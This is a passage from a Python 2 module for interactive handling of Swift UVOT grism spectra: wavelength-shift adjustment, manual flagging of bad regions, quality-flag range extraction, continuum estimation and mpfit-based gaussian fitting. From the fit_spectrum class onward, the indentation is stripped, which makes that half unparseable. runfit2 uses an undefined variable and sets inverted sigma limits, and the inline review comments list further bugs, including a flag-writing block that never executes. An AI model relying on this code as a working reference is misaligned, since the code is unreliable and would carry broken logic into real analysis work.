       if f.fileinfo(1)['filemode'] != 'update' :
          print "reopening the fits file with mode set to update"
          filename = f.filename()
          try:
             f.close()
             f = fits.open(filename,mode='update')
          except:
             # NOTE(review): raising a string is invalid in modern Python
             # (it raises TypeError itself); should be an Exception instance.
             raise "reopen fits file with mode set to update, and rerun "
    elif file != None:
       f = fits.open(file,mode='update')
    else:
       raise IOError("what ? nothing to adjust?")

    # axis instance to use
    if openplot != None:
       fig = openplot
       fig.clf()
    else:
       fig = plt.figure()
    fig.set_facecolor('lightgreen')
    ax = fig.add_axes([0.13,0.13,0.8,0.7])
    canvas = ax.figure.canvas
    ax.set_title("")
    # initial plot to get started
    w = f[2].data['lambda']
    flx = f[2].data['flux']
    spectrum, = ax.plot(w, flx, )
    # add annotation
    if ylim[0] == None:
       ylim = ax.get_ylim()
    else:
       ax.set_ylim(ylim)
    # Draw the line identifications 80% up the y-range.
    for io in ions:
       plot_line_ids(ax,ylower=0.8*(ylim[1]-ylim[0])+ylim[0], ion=io)
    ax.set_xlabel(u'wavelength($\AA$)')
    ax.set_ylabel(u'flux')
    fig.show()
    print "Now is a good time to select a part of the figure to use for shifting the wavelengths."
    #  drag figure
    #background = canvas.copy_from_bbox(ax.bbox)
    newspec = DraggableSpectrum(ax,spectrum)
    done = False
    delwav = 0
    try:
       while not done:
          if raw_input("Do you want to adjust wavelengths ? (Y) ").upper()[0] == 'Y':
             print 'drag the spectrum until happy'
             ax.set_title("when done press key")
             newspec.connect()
             print "The selected wavelength shift is ",newspec.delwav," and will be applied when done. "
             # register the shift from the last run
             ans = raw_input("When done hit a key")
             delwav += newspec.out_delwav()
             ax.set_title("")
          done = True
       newspec.disconnect()
       # Write the accumulated shift into both extensions and shift the
       # wavelength column in place (the response file is NOT updated).
       print "wavelength shift found = %s"%(delwav)
       f[2].header['WAVSHFT'] = (delwav, "manual wavelength shift applied")
       f[2].data['LAMBDA'] = f[2].data['LAMBDA'] + delwav
       f[1].header['WAVSHFT'] = (delwav, "manual wavelength shift applied")
       f[1].header['COMMENT'] = "Manual wavelength shift not applied to response file."
       f.verify()
       f.flush()
    except:
       raise RuntimeError("Some error occurred during the selection of the wavelength shift. No shift was applied.")
       newspec.disconnect()
    # apply the shift
    return fig
class SelectBadRegions:
    """Select the bad regions on a spectrum interactively

    Each bad region is a horizontal Line2D whose two x endpoints mark the
    start and end wavelengths; clicking near an existing endpoint (within
    `eps`) grabs and moves it, clicking elsewhere starts a new region.
    """
    def __init__(self, ax, spectrum,badregions=[],eps=None,marker='^'):
        self.spectrum = spectrum
        self.yval = 0
        self.region = [0,0] # xstart and xend of bad region in data coordinates
        self.badregions = badregions # list of the Line2D for all bad regions (no check but type is matplotlib.lines.Line2D for each list element)
        self.line = Line2D([0,0],[0,0],marker=marker,color='k',lw=2,alpha=0.4,markerfacecolor='gold')
        self.ax = ax
        if eps == None:
            # Grab tolerance: 1/40th of the current x-range.
            self.epsilon = (ax.get_xlim()[1]-ax.get_xlim()[0])/40 # angstrom
        else: self.epsilon = eps
        self.marker=marker

    def connect(self):
        'connect to all the events we need'
        self.cidpress = self.spectrum.figure.canvas.mpl_connect(
            'button_press_event', self.on_press)
        self.cidrelease = self.spectrum.figure.canvas.mpl_connect(
            'button_release_event', self.on_release)
        self.cidmotion = self.spectrum.figure.canvas.mpl_connect(
            'motion_notify_event', self.on_motion)
        self.cidkey = self.spectrum.figure.canvas.mpl_connect(
            'key_press_event', self.on_key)
        print "active"

    def on_press(self, event):
        'on button press we check if near endpoint of region'
        if event.inaxes != self.spectrum.axes: return
        self.region[1] = None
        # check if near existing Line2D (adjust)
        if len(self.badregions) > 0:
            print "going through badregions"
            for self.line in self.badregions:
                xdat = self.line.get_xdata()
                #print "*** ",np.abs(xdat[0] - event.xdata)
                #print "*** ",np.abs(xdat[1] - event.xdata)
                #print "*** ",xdat
                if (np.abs(xdat[0] - event.xdata) < self.epsilon) :
                    # Grabbed the left endpoint: keep the right one fixed.
                    print "at point ",xdat[0]," keeping ",xdat[1]," swapping"
                    k = self.badregions.index(self.line)
                    xx = self.badregions.pop(k)
                    self.line.set_xdata(np.array([xdat[1],event.xdata]))
                elif (np.abs(xdat[1] - event.xdata) < self.epsilon):
                    # Grabbed the right endpoint: keep the left one fixed.
                    print "at point ",xdat[1]," keeping ",xdat[0]
                    k = self.badregions.index(self.line)
                    xx = self.badregions.pop(k)
                    self.line.set_xdata(np.array([xdat[0],event.xdata]))
                else:
                    print "new line"
                    self.yval = event.ydata
                    x0, y0, x1, y1 = event.xdata, self.yval, event.xdata, self.yval
                    self.line = Line2D([x0,x1],[y0,y1],marker=self.marker,color='k',lw=2,alpha=0.4,markerfacecolor='gold')
                    self.ax.add_line(self.line)
        else:
            # new line
            self.yval = event.ydata
            x0, y0, x1, y1 = event.xdata, self.yval, event.xdata, self.yval
            self.line = Line2D([x0,x1],[y0,y1],marker=self.marker,color='k',lw=2,alpha=0.4,markerfacecolor='gold')
            self.ax.add_line(self.line)
        print "position [%f,*]"%(event.xdata,)

    def on_motion(self, event):
        'on motion we will move the spectrum if the mouse is over us'
        if self.region[1] is not None: return
        if event.inaxes != self.spectrum.axes: return
        # Drag the free endpoint of the active region.
        xdat = self.line.get_xdata()
        xdat[-1] = event.xdata
        self.line.set_xdata(xdat)
        self.ax.figure.canvas.draw()

    def on_release(self, event):
        'on release we reset the press data'
        if event.inaxes != self.spectrum.axes:
            self.yval = None
            self.region = [0,0]
            return
        x1,y1 = event.xdata, event.ydata
        self.region[1] = event.xdata
        self.badregions.append(self.line)
        self.ax.figure.canvas.draw()
        if event.inaxes == self.spectrum.axes:
            print "-> position (%f,%e)"%(event.xdata,event.ydata)

    def on_key(self,event):
        'on press outside canvas disconnect '
        print "you pushed the |%s| key"%event.key

    def disconnect(self):
        'disconnect all the stored connection ids'
        self.spectrum.figure.canvas.mpl_disconnect(self.cidpress)
        self.spectrum.figure.canvas.mpl_disconnect(self.cidrelease)
        self.spectrum.figure.canvas.mpl_disconnect(self.cidmotion)
        self.spectrum.figure.canvas.mpl_disconnect(self.cidkey)
        print "disconnected"

    def get_badlines(self):
        # Returns (Line2D objects, list of [xstart, xend] pairs).
        lines = []
        for r in self.badregions:
            lines.append(r.get_xdata())
        return self.badregions, lines

    def set_badregions(self,badregions):
        self.badregions = badregions
def uvot_flag_bad_manually(file=None,openfile=None,openplot=None,
        ylim=[None,None], ):
    """manually flag bad parts of the spectrum

    Parameters
    ----------
    file : path
       extracted spectral data (i.e., after running uvotgetspec.getSpec()
    openfile : filehandle
    openplot : matplotlib.figure
       figure handle
    ylim : list
       limits y-axis

    Notes
    -----
    returns
    ax:axes instance, fig:figure instance, [f:fits file handle if passed with openfile]

    The data quality flag of flagged pixels will be set to "bad"
    The header will be updated with the value of the wavelength shift
    """
    from uvotgetspec import quality_flags
    # Need write access to the FITS file (same pattern as the wavelength
    # adjustment routine above).
    if openfile != None:
       f = openfile
       if f.fileinfo(1)['filemode'] != 'update' :
          print "reopening the fits file with mode set to update"
          filename = f.filename()
          try:
             f.close()
             f = fits.open(filename,mode='update')
          except:
             # NOTE(review): raising a string is invalid in modern Python.
             raise "reopen fits file with mode set to update, and rerun "
    elif file != None:
       f = fits.open(file,mode='update')
    else:
       raise IOError("what ? nothing to adjust?")

    # axis instance to use
    if openplot != None:
       fig = openplot
       fig.clf()
    else:
       fig = plt.figure()
    fig.set_facecolor('white')
    ax = fig.add_axes([0.08,0.13,0.87,0.7])
    canvas = ax.figure.canvas
    ax.set_title("")
    # initial plot to get started
    w = f[2].data['lambda']
    flx = f[2].data['flux']
    spectrum, = ax.plot(w, flx, )
    # highlight bad quality
    q = f[2].data['quality']
    plotquality(ax,w,q,flag=['bad','zeroth','weakzeroth','overlap'])
    # add annotation
    if ylim[0] == None:
       ylim = ax.get_ylim()
    else:
       ax.set_ylim(ylim)
    #for io in ions:
    #   plot_line_ids(ax,ylower=0.8*(ylim[1]-ylim[0])+ylim[0], ion=io)
    ax.set_xlabel(u'wavelength($\AA$)')
    ax.set_ylabel(u'flux')
    fig.show()
    print "Select bad regions: Zoom in before starting. Rerun for more regions."
    #  when animating / blitting figure
    #background = canvas.copy_from_bbox(ax.bbox)
    s = SelectBadRegions(ax,spectrum)
    s.set_badregions([])
    flag = quality_flags()
    done = False
    try:
       while not done:
          if raw_input("Do you want to mark bad regions ? (Y) ").upper()[0] == 'Y':
             print 'Select bad wavelengths in the spectrum until happy'
             ax.set_title("when done press key")
             s.connect()
             # register the shift from the last run
             ans = raw_input("When done hit the d key, then return, or just return to abort")
             badregions, lines = s.get_badlines()
             print "got so far: "
             for br in lines: print "bad region : [%6.1f,%6.1f]"%(br[0],br[1])
             print badregions
             ax.set_title("")
             s.disconnect()
          else:
             done = True
    except:
       raise RuntimeError("Some error occurred during the selection of the bad regions. No changes were applied.")
       s.disconnect()
    # NOTE(review): this unconditionally clears `lines`, so the block below
    # that writes the flagged regions into the FITS file can never run —
    # looks unintentional; confirm before relying on this routine.
    lines = []
    #
    if len(lines) > 0:
       print "The selected bad regions are "
       for br in lines: print "bad region : [%6.1f,%6.1f]"%(br[0],br[1])
       print " and will be applied to the FITS file.\n "
       f[2].header['comment'] = "added bad regions manually (qual=bad)"
       for br in lines:
          #try:
             # find points that are not flagged, but should be flagged
             if br[1] < br[0]:
                br3 = br[0]; br[0]=br[1]; br[1]=br3
             q1 = (check_flag(f[2].data['quality'],'bad') == False)
             q = ((f[2].data['lambda'] > br[0]) &
                 (f[2].data['lambda'] < br[1]) &
                 q1 &
                 np.isfinite(f[2].data['quality']) )
             f[1].data['QUALITY'][q] = f[1].data['QUALITY'][q] + flag['bad']
             f[2].data['QUALITY'][q] = f[2].data['QUALITY'][q] + flag['bad']
          #except:
          #   raise RuntimeError("Some error occurred during writing to file of the bad regions. No changes were applied.")
          #   s.disconnect()
       f.verify()
       f.flush()
       print "file was updated"
    print type(f)
    if file == None:
       return fig, ax, f
    else:
       f.close()
       return fig,ax
def plot_line_ids(ax,ylower=None,ion='HI',color='k',dash=[0.07,0.10]):
    """add the line ids to the plot

    parameters
    ----------
    ax : plot handle
    ylower : float
      y-level where the bottom of the line should be
    ion : ['HI','HeI','HeII',]
      key to the ion to be plotted
    """
    catalogue = spdata[ion]
    xmin, xmax = ax.get_xlim()
    ymin, ymax = ax.get_ylim()
    # Tick length and label offset as fractions of the y-range.
    tick_len = dash[0]*(ymax-ymin)
    label_off = dash[1]*(ymax-ymin)
    marked = []
    for entry in catalogue:
        wv = entry['wavevac']
        if xmin < wv < xmax:
            ax.text(wv,ylower+label_off,entry['label'],fontsize=8,color=color,
                horizontalalignment='left',verticalalignment='center',
                rotation='vertical' )
            marked.append(wv)
    ax.vlines(marked,ylower,ylower+tick_len,color='k')
def plotquality(ax,w,quality,flag=['bad'],colors=['c','g','y','m','b','r','k'],alpha=0.2,):
    """add greyscale regions in plot for each quality flag

    parameters
    ----------
    ax : matplotlib.axes.Axes instance
    w : array
      x-axis values
    quality : array
      quality flags matching x-axis points
    flag : list of strings
      each list value must be one of the valid keys from quality_flags()
    colors : array
      color values
    alpha : float
      alpha value for transparency
    """
    from uvotgetspec import quality_flags
    flagdefs = quality_flags()
    k=0
    for fla in flag:
        fval = flagdefs[fla]
        q = quality >= fval  # limit the search
        indx = np.where(q)[0] # indx of wave where flag
        fval2 = fval*2
        # Integer-division trick to pick entries whose value is not an
        # exact multiple of 2*fval. NOTE(review): relies on Python 2 `/`
        # being integer division for ints — breaks under Python 3.
        loc = quality[q]/fval2*fval2 != quality[q]
        v = indx[loc] # indices of the points with this flag
        if len(v) > 1:  # require at least 2
           # Merge consecutive indices into [first, last] ranges; isolated
           # single points are dropped.
           vrange = []
           v1 = v[0]
           vlast = v1
           for v2 in v[1:]:
              if v2-vlast > 1:  # require neighboring pixels
                 #
                 vrange.append([v1,vlast])
                 v1 = v2
                 vlast = v2
              else:
                 vlast=v2
           if vlast > v1: vrange.append([v1,vlast])  # last range
           print "for quality="+fla+" we get ranges ",vrange
           for v1 in vrange:
              ax.axvspan(w[v1[0]],w[v1[1]],facecolor=colors[k],alpha=alpha)
    # the algorithm skips two adjacent points which will be ignored.
def check_flag(quality,flag,chatter=0):
    """ return a logical array where the elements are
        True if flag is set """
    from uvotgetspec import quality_flags
    loc = np.zeros(len(quality),dtype=bool)
    if flag == 'good': return loc
    qf = quality_flags()[flag]
    mf=qf.bit_length() # bytes in binary string -2
    binflag = bin(qf) # string with binary flag
    # Reverse the binary string so index i corresponds to bit i.
    qf = []
    for k in binflag: qf.append(k)
    qf.reverse()
    # find flag
    for i in range(0,mf):
        if qf[i]=="1":
           kpos=i
           break
    # NOTE(review): `k` here is the leftover loop variable from building
    # qf above, not the flag — debug output only, but misleading.
    if chatter> 4: print "flag = ",k," length=",mf
    # skip the good ones
    qz = np.where(quality > 0)[0]
    if chatter > 4: print "qual > 0 at ",qz
    if len(qz) == 0:
       return loc
    for i in qz :
        bq = int(quality[i]) # data quality point i
        mv = bq.bit_length() # binary length
        binq = bin(bq)
        qf=[]
        for k in binq:
           qf.append(k)
        qf.reverse()
        if mv < mf:
           # NOTE(review): `break` aborts the whole scan as soon as one
           # value is shorter than the flag — remaining points are never
           # examined; a `continue` may have been intended.
           break
        else:
           if qf[kpos] == '1':
              loc[i] = True
    return loc
def get_continuum_values(wave,flux,cont_regions=[],):
    """give a list of good continuum bands in spectrum and
    determine averages

    parameters
    ----------
    wave : array
      wavelength array
    flux : array
      flux array
    cont_regions : list
      a list of [start, stop] wavelengths

    returns
    -------
    cont_list: list
      a list comprised of average wavelength, and continuum flux
      value in each band; empty when no regions were given
    """
    # Fixed: previously a bare `return` yielded None for an empty region
    # list; an empty list keeps the return type consistent for callers.
    result = []
    for r in cont_regions:
        # band is half-open on the left: wave > start, wave <= stop
        q = (wave > r[0]) & (wave <= r[1])
        result.append([wave[q].mean(),flux[q].mean()])
    return result
def get_smooth_continuum(cont_list,wave_range=[None,None],):
    """give a list of continuum points, put a smooth line
    through them and return as a function valid on the
    wave_range.

    parameters
    ----------
    cont_list: list
       list items must be a list of [wavelength, flux] for
       continuum points
    wave_range : list
       minimum and maximum wavelengths for the solution; either entry
       may be None, in which case the data range extended by 250A on
       that side is used

    returns
    -------
    a function that returns the continuum as a function of
    wavelength
    """
    import numpy as np
    from scipy import interpolate
    c = np.asarray(cont_list)
    # reject 1-D or wrongly shaped input early: c.shape[1] would raise a
    # confusing IndexError for 1-D input
    if c.ndim != 2 or c.shape[1] != 2:
        raise RuntimeError( "check the cont_list parameter" )
    w = c[:,0]
    f = c[:,1]
    # work on local copies of the limits: the original assigned into
    # wave_range, permanently mutating the shared default [None,None]
    wmin, wmax = wave_range[0], wave_range[1]
    if wmin is None:
        wmin = w.min()-250.0
    if wmax is None:
        wmax = w.max()+250.0
    # least-squares linear (k=1) smoothing spline through the points
    tck = interpolate.splrep(w,f,k=1,
          xb=wmin,xe=wmax,
          s=len(w)+np.sqrt(2*len(w)))
    # sample the spline on a 100A grid and return a linear interpolator
    wgrid = np.arange(wmin,wmax+100,100)
    fgrid = interpolate.splev(wgrid,tck,)
    return interpolate.interp1d(wgrid,fgrid,)
def plot_spectrum(ax,phafile,errbars=False, errhaze=False,
        hazecolor='grey', hazealpha=0.2, flag='all'):
    """plot a uvot grism spectrum from a pha file

    parameters
    ----------
    ax : matplotlib axes instance
       axis to draw on
    phafile : str
       spectrum file; extension 2 must hold the lambda/flux/fluxerr/
       quality columns, extension 1 the date-obs keyword
    errbars : bool
       if True draw error bars; otherwise draw lines, optionally with
       a shaded error "haze"
    errhaze : bool
       draw the shaded error band (line mode only)
    hazecolor, hazealpha :
       appearance of the error band
    flag : str
       quality flag selecting which index ranges to plot
       (see quality_flags_to_ranges)
    """
    f = fits.open(phafile)
    try:
        q = f[2].data['quality']
        r = quality_flags_to_ranges(q)[flag]
        label = f[1].header['date-obs']
        w = f[2].data['lambda']
        flx = f[2].data['flux']
        err = f[2].data['fluxerr']
    finally:
        f.close()   # was never closed: leaked one file handle per call
    # the original tested the undefined name `witherr` here (NameError);
    # the intended switch is the errbars argument
    if not errbars:
        for rr in r:
            ax.plot(w[rr[0]:rr[1]],flx[rr[0]:rr[1]],label=label)
            if errhaze:
                ax.fill_between(w[rr[0]:rr[1]],
                     flx[rr[0]:rr[1]]-err[rr[0]:rr[1]],
                     flx[rr[0]:rr[1]]+err[rr[0]:rr[1]],
                     color=hazecolor,alpha=hazealpha)
    else:
        for rr in r:
            ax.errorbar( w[rr[0]:rr[1]],flx[rr[0]:rr[1]],
                 yerr=err[rr[0]:rr[1]],label=label)
def quality_flags_to_ranges(quality):
    """given a quality flag array, reduce the quality to index ranges
    for each flag (except for "good" = 0.)

    parameters
    ----------
    quality : array of int
       quality words for consecutive data points

    returns
    -------
    quality_ranges : dict
       for each flag except 'good', a list of [first,last] inclusive
       index ranges; the key "all" collects the ranges of all flags
    """
    from uvotgetspec import quality_flags
    flagdefs = quality_flags()
    flags=flagdefs.keys()
    quality_ranges = {}
    val = []
    for fla in flags:
        # 'good' (0) has no bit to test.  The original used `break`,
        # which aborted the whole loop and silently dropped every flag
        # that happened to come after 'good' in the (arbitrary) dict order.
        if fla == 'good': continue
        fval = flagdefs[fla]
        q = quality >= fval              # limit the search
        indx = np.where(q)[0]            # indices where this flag may be set
        fval2 = fval*2
        # bit test: the fval bit is set iff clearing everything below
        # 2*fval changes the word (integer floor division on int arrays)
        loc = quality[q]//fval2*fval2 != quality[q]
        v = indx[loc]                    # indices of the points with this flag
        # start a fresh list for every flag: previously vrange was only
        # created inside the len(v) > 1 branch, so a flag with too few
        # points stored the *previous* flag's ranges (or raised NameError
        # for the very first flag)
        vrange = []
        if len(v) > 1:                   # require at least 2 points
            v1 = v[0]
            vlast = v1
            for v2 in v[1:]:
                if v2-vlast > 1:         # require neighboring pixels
                    vrange.append([v1,vlast])
                    val.append([v1,vlast])
                    v1 = v2
                    vlast = v2
                else:
                    vlast=v2
            if vlast > v1:               # close the last open range
                vrange.append([v1,vlast])
                val.append([v1,vlast])   # previously missing from "all"
        quality_ranges.update({fla:vrange})
    quality_ranges.update({"all":val})
    return quality_ranges
def complement_of_ranges(ranges,rangestart=0,rangeend=None):
    """given a list of exclusion ranges, compute the complement

    parameters
    ----------
    ranges : list
       list of [first,last] *inclusive* index pairs, as produced by
       quality_flags_to_ranges(); they need not be sorted and may overlap
    rangestart, rangeend : int
       inclusive limits of the full index range to complement within;
       rangeend must be given

    returns
    -------
    list of [first,last] inclusive index pairs covering every index in
    [rangestart,rangeend] that lies inside none of the input ranges
    """
    if rangeend is None:
        raise ValueError("complement_of_ranges: rangeend must be given")
    result = []
    pos = rangestart
    # walk the exclusions in ascending order; overlapping or nested
    # ranges are handled by advancing `pos` monotonically
    for r1, r2 in sorted([[int(r[0]), int(r[1])] for r in ranges]):
        if r1 > pos:
            result.append([pos, min(r1 - 1, rangeend)])
        pos = max(pos, r2 + 1)
        if pos > rangeend:
            break
    if pos <= rangeend:
        result.append([pos, rangeend])
    return result
class gaussian():
    """A 1-D gaussian  amp * exp( -((x-pos)/sig)**2 )  whose parameters
    are kept as mpfit-style 'parinfo' records in self.parameters.
    """
    def __init__(self,param=None):
        # NOTE(review): this instance attribute shadows the parameters()
        # method below, making that method unreachable on instances.
        # `param` is currently unused -- kept for interface compatibility.
        self.parameters = {"model":"gauss",
            "parinfo":[
            {"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'amp'},
            {"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'pos'},
            {"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'sig'},]
            }
    def parameters(self):
        # dead code: shadowed by the instance attribute of the same name
        return self.parameters
    def value(self, x):
        """evaluate the gaussian at x (scalar or array)"""
        # single pass over the records instead of one loop per parameter
        vals = {}
        for p in self.parameters["parinfo"]:
            vals[p["parname"]] = p["value"]
        return vals['amp'] * np.exp( - ((x-vals['pos'])/vals['sig'])**2 )
    def update(self,amp=None,pos=None,sig=None):
        """set any of amp, pos, sig; a None argument leaves that value alone"""
        new = {'amp': amp, 'pos': pos, 'sig': sig}
        for p in self.parameters["parinfo"]:
            v = new[p["parname"]]
            if v is not None:      # was `!= None`; identical for numbers, incl. 0
                p["value"] = v
class poly_background():
    """Polynomial background; coefficients are stored in numpy.polyval
    order (highest power first)."""
    def __init__(self,coef=[0]):
        # store a copy: the default [0] is shared between instances, and
        # aliasing a caller's list would let it change under us
        self.poly_coef = list(coef)
    def value(self,x):
        """evaluate the polynomial at x (scalar or array)"""
        # NB the original imported numpy in the *class* body, which does
        # not put `np` in method scope; import locally instead
        import numpy as np
        return np.polyval(self.poly_coef,x)
    def update(self,coef):
        """replace the coefficient list"""
        self.poly_coef = list(coef)
class fit_spectrum():
"""
Fit the spectrum in a way similar to Xspec.
Parameters
==========
ax : matplotlib.axes.AxesSubplot instance
spectrum : spectrum
spectrum [currently second extension of spectrum file uvot grism]
fitparameters :
for each model to fit, a list of fit parameters
Notes
=====
The method of fitting is similar to that used in XSpec because
non-linear fitting is better done while freezing some parameters
at a time, depending on need, and iterating. This is superior to
automated fitting methods.
Initial set up:
Though the plan is to introduce models to fit to at some point,
the initial fitting will be for a continuum with gaussians.
"""
import sys
import numpy as np
from mpfit import mpfit
def __init__(self, ax, spectrum, fit_parameters=[], ):
self.spectrum = spectrum
self.fit_parameters = fit_parameters
self.ax = ax
self.funargs = []
self.models = [] # active models
self.valid_model_names=['gaussian','poly_background'] # implemented models
def add_model(self,modelname):
"""
Add a model to the fit_parameters
Notes
=====
open a new item and add the parameters and argument names of the
specific model
Build the parinfo list, e.g., we need a list with for each parameter:
parinfo = [
{'limited': [1,0], 'limits': [0.1,0.0], 'value': bg, 'parname': 'bg0'},
{'limited': [0,0], 'limits': [0.0,0.0], 'value': 0.0, 'parname': 'bg1' },
{'limited': [1,0], 'limits': [0.0,0.0], 'value': amp1, 'parname': 'amp1'},
{'limited': [1,1], 'limits': [pos1a,pos1b], 'value': pos1, 'parname': 'pos1'},
...
]
where
limited indicated if the limits are applied (1=True,0=False)
limits gives the parameter range
value gives the starting(or fixed) value
parname gives the parameter name
if the value needs to be fixed, the limits must be set to a very small range
for running mpfit (1e-5 * value?)
"""
# verify valid model name ?
# ...
if not (modelname in self.valid_model_names):
print "illegal model name"
print "valid names are :",self.valid_model_names
return
self.models.append(modelname)
fitparms, funargs = eval("self.model_"+modelname+"(0,init_parameters=True)")
self.fit_parameters.append( fitparms )
self.funargs.append( funargs )
def show_parameters(self,):
"""
print out the parameters and values
"""
#use write( sys.stdout, ) ???
print "comp model param value lower upper \n"
for k in range(len(self.models)):
modelno = k
name = self.fit_parameters[k]["model"]
params = self.fit_parameters[k]["parinfo"]
for p in params:
print "%2i %16s %8s %12.5e %12.5e %12.5e"%(k,name,p["parname"][:-2],
p["value"],p["limits"][0],p["limits"][1])
def update_parameters(self,component=None,name=None,value=None,lower=None,upper=None):
"""
Change the limits, start value, etc. for a model parameter
"""
fitparms = self.fit_parameters
print " not yet implemented -- need a widget "
if component == None: # do all components
for k in range(len(self.models)):
self.update_parameters(k,name=name,value=value,lower=lower,upper=upper)
else:
if component in range(len(self.models)):
parms = fitparms[component]
parnames = []
for z in parms['parinfo']:
parnames.append(z['parname'][:-2])
else:
print "illegal component number"
if name == None: # do all variables in parms
for m in range(len(parms['parinfo'])):
if value != None: parms['parinfo'][m]['value'] = value
if lower != None:
parms['parinfo'][m]['limits'][0] = lower
parms['parinfo'][m]['limited'][0] = 1
if upper != None:
parms['parinfo'][m]['limits'][1] = upper
parms['parinfo'][m]['limited'][1] = 1
else:
if name in parnames:
for i in range(len(parnames)):
if name == parnames[i]:
m=i
continue
if value != None: parms['parinfo'][m]['value'] = value
if lower != None:
parms['parinfo'][m]['limits'][0] = lower
parms['parinfo'][m]['limited'][0] = 1
if upper != None:
parms['parinfo'][m]['limits'][1] = upper
parms['parinfo'][m]['limited'][1] = 1
else:
print "illegal parameter name, valid names are :",parnames
def model_poly_background(self,p, fjac=None, x=None, y=None,
err=None,init_parameters=False):
# up to sixth order polynomial
if init_parameters:
component_number=len(self.models)
cn = "%02s"%(component_number)
return {"model":"poly_background", "parinfo":[
{"limited":[1,1],"limits":[1,1],"value":1, "parname":'order'+cn}, # fixed! limits=value
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef0'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef1'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef2'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef3'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef4'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef5'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef6'+cn},
]},['x','y','err']
order = p[0]
if type(order) != int:
print "problem model_poly_background order not an int:", order
model = np.polyval(p[1:order+2],x)
status = 0
return [status, (y-model)/err]
def model_gaussian(self,p, fjac=None, x=None, y=None, err=None,init_parameters=False):
if init_parameters:
component_number=len(self.models)
cn = "%02s"%(component_number)
return {"model":"gauss","parinfo":[
{"limited":[0,0],"limits":[0,0],"value":1.0,"parname":'amp'+cn},
{"limited":[0,0],"limits":[0,0],"value":9.0,"parname":'pos'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.5,"parname":'sig'+cn},
]}, ['x', 'y', 'err']
amp1,pos1,sig1 = p
model = amp1 * np.exp( - ((x-pos1)/sig1)**2 )
status = 0
return [status, (y-model)/err]
def fit(self,):
"""
call the fitter
"""
x = self.spectrum.wavelength
y = self.spectrum.flux
err = self.spectrum.fluxerr
# build initial parameter value list
p0 = []
pinfo = []
for x in self.fit_parameters:
par = x["parinfo"]
for pv in par:
p0.append(pv['value'])
pinfo.append(pv)
# build argument list
fkw={'x':x,'y':y,'err':err}
# call L-M fitter
Z = mpfit.mpfit(fit_function,p0,functkw=fkw,parinfo=pinfo,quiet=True)
if (Z.status <= 0): print 'fit_spectrum.mpfit error message = ', Z.errmsg
# update the fit (parinfo...?), return results
self.result = Z
return Z
def fit_function(self, p, fjac=None, x=None, y=None, err=None):
"""
Define the 1D spectrum function to fit
parameters
----------
x : array
the wavelengths
y : array
the estimated flux
err : array
the error
p : list
a list of parameters to fit
"""
F = 0.
i = 0
nmod = len(self.models)
for k in range(nmod):
npar = len(self.fitparms[k]["parinfo"])
arg = "("
p0 = []
for w in range(npar):
p[0].append( p[i])
i += 1
fjac_mod = fjac[i:i+npar,i:i+npar]
# fjac is a dummy parameter in gauss and poly_background
# any other use needs testing that the correct slice has
# been made ...
arg += ", fjac=fjac_mod, x=x, y=y, err=err)"
F = F + eval("model_"+self.models[k]+arg)
status = 0
if err != None:
return [status, (y-F)/err]
else:
return [status, (y-F)]
def runfit2(x,f,err,bg,amp1,pos1,sig1,amp2,pos2,sig2,
amp2lim=None,fixsig=False,
fixsiglim=0.2, fixpos=False,chatter=0):
'''
Fit two gaussians plus a linear varying background to f(x)
Parameters
==========
x : array
f : array
err : ?
bg : ?
gaussian_parameters : array
for each gaussian the array provides the following parameters
- amplitude f(xo)
- position xo in x
- sigma (width of the gaussian) fit=A.exp( - ((x-xo)/sig)**2 )
- lower limit on amplitude Amin or None
- upper limit on amplitude Amax ro None
- sig_lo lower limit on sigma
- sig_hi upper limit on sigma
- fixamp boolean (True or False) for fixed amplitude
- fixsig boolean (True or False) for fixed sigma
'''
import numpy as np
from mpfit import mpfit
gp = np.array(gaussian_parameters,)
n_gaussians = len(gaussian_parameters)
if np.isfinite(bg):
bg0 = bg
else: bg0 = 0.0
bg1 = 0.0
if np.isfinite(sig1):
sig1 = np.abs(sig1)
else: sig1 = 3.1
if np.isfinite(sig2):
sig2 = np.abs(sig2)
else: sig2 = 4.2
p0 = (bg0,bg1,amp1,pos1,sig1,amp2,pos2,sig2)
# define the variables for the function 'myfunct'
fa = {'x':x,'y':f,'err':err}
if fixpos:
pos1a = pos1-0.05
pos1b = pos1+0.05
pos2a = pos2-0.05
pos2b = pos2+0.05
else:
# adjust the limits to not cross half the predicted distance of orders
pos1a = pos1-sig1
pos1b = pos1+sig1
pos2a = pos2-sig1
pos2b = pos2+sig1
# case : pos1 < pos2
if (pos1 < pos2):
pos1b = pos2a = 0.5*(pos1+pos2)
else:
pos1a = pos2b = 0.5*(pos1+pos2)
if fixsig:
sig1_lo = sig1-fixsiglim
sig1_hi = sig1+fixsiglim
sig2_lo = sig2-fixsiglim
sig2_hi = sig2+fixsiglim
else:
# make sure lower limit sigma is OK
sig1_lo = max([sig1-10.,35.])
sig2_lo = max([sig2-10.,35.])
sig1_hi = min([sig1+10.,5.])
sig2_hi = min([sig2+10.,5.])
if amp2lim != None:
amp2min, amp2max = amp2lim
parinfo = [{ \
'limited': [1,0], 'limits' : [np.min([0.0,bg0]),0.0],'value': bg, 'parname': 'bg0' },{ \
'limited': [0,0], 'limits' : [0.0,0.0], 'value' : 0.0, 'parname': 'bg1' },{ \
'limited': [1,0], 'limits' : [0.0,0.0], 'value' : amp1, 'parname': 'amp1' },{ \
'limited': [1,1], 'limits' : [pos1a,pos1b], 'value' : pos1, 'parname': 'pos1' },{ \
'limited': [1,1], 'limits' : [sig1_lo,sig1_hi], 'value' : sig1, 'parname': 'sig1' },{ \
'limited': [1,1], 'limits' : [amp2min,amp2max], 'value' : amp2, 'parname': 'amp2' },{ \
'limited': [1,1], 'limits' : [pos2a,pos2b], 'value' : pos2, 'parname': 'pos2' },{ \
'limited': [1,1], 'limits' : [sig2_lo,sig2_hi], 'value' : sig2, 'parname': 'sig2' }]
else:
parinfo = [{ \
